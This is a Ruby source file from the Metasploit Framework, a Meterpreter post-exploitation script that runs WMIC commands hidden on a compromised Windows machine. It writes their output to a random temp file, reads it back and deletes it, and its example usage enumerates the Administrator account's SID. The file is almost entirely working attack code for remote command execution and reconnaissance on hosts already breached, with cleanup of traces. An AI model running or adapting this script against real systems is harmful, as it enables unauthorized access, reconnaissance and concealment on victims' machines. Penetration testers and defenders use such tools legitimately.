metasploit-framework/scripts/meterpreter/wmic.rb

116 lines
4.3 KiB
Ruby
Raw Normal View History

#Meterpreter script for running WMIC commands on Windows 2003, Windows Vista
# and Windows XP and Windows 2008 targets.
#Provided by Carlos Perez at carlos_perez[at]darkoperator[dot]com
#Verion: 0.1
################## Variable Declarations ##################
session = client
wininfo = client.sys.config.sysinfo
# Setting Arguments
@@exec_opts = Rex::Parser::Arguments.new(
"-h" => [ false,"Help menu." ],
"-c" => [ true,"Command to execute. The command must be enclosed in doble quotes."],
"-f" => [ true,"File where to saved output of command."],
"-s" => [ true,"Text file with list of commands, one per line."]
)
#Setting Argument variables
commands = []
script = []
outfile = nil
help = 0
################## Function Declarations ##################
# Function for running a list of WMIC commands stored in a array, returs string
def wmicexec(session,wmiccmds= nil)
windr = ''
tmpout = ''
windrtmp = ""
session.response_timeout=120
begin
tmp = session.fs.file.expand_path("%TEMP%")
wmicfl = tmp + "\\"+ sprintf("%.5d",rand(100000))
wmiccmds.each do |wmi|
print_status "running command wmic #{wmi}"
puts wmicfl
r = session.sys.process.execute("cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe /append:#{wmicfl} #{wmi}", nil, {'Hidden' => true})
sleep(2)
#Making sure that wmic finnishes before executing next wmic command
prog2check = "wmic.exe"
found = 0
while found == 0
session.sys.process.get_processes().each do |x|
found =1
if prog2check == (x['name'].downcase)
sleep(0.5)
print_line "."
found = 0
end
end
end
r.close
end
# Read the output file of the wmic commands
wmioutfile = session.fs.file.new(wmicfl, "rb")
until wmioutfile.eof?
tmpout << wmioutfile.read
end
wmioutfile.close
rescue ::Exception => e
print_status("Error running WMIC commands: #{e.class} #{e}")
end
# We delete the file with the wmic command output.
c = session.sys.process.execute("cmd.exe /c del #{wmicfl}", nil, {'Hidden' => true})
c.close
tmpout
end
# Function for writing results of other functions to a file
def filewrt(file2wrt, data2wrt)
output = ::File.open(file2wrt, "a")
data2wrt.each_line do |d|
output.puts(d)
end
output.close
end
def usage
print_line("Windows WMIC Command Execution Meterpreter Script ")
puts @@exec_opts.usage
print_line("USAGE:")
print_line("run wmic -c \"WMIC Command Argument\"\n")
print_line("NOTE:")
print_line("Not all arguments for WMIC can be used, the /append: option is used by the script")
print_line("for output retrival. Arguments must be encased in doble quotes and special charechters escaped\n")
print_line("Example:")
print_line("run wmic -c \"useraccount where (name = \\\'Administrator\\\') get name, sid\"\n")
end
################## Main ##################
@@exec_opts.parse(args) { |opt, idx, val|
case opt
when "-c"
commands = val.split("/")
when "-s"
script = val
if not ::File.exists?(script)
raise "Command List File does not exists!"
else
::File.open(script, "r").each_line do |line|
commands << line.chomp
end
end
when "-f"
outfile = val
when "-h"
help = 1
end
}
if args.length == 0 or help == 1
usage
elsif outfile == nil
puts wmicexec(session,commands)
else
print_status("Saving output of WMIC to #{outfile}")
filewrt(outfile, wmicexec(session,commands))
end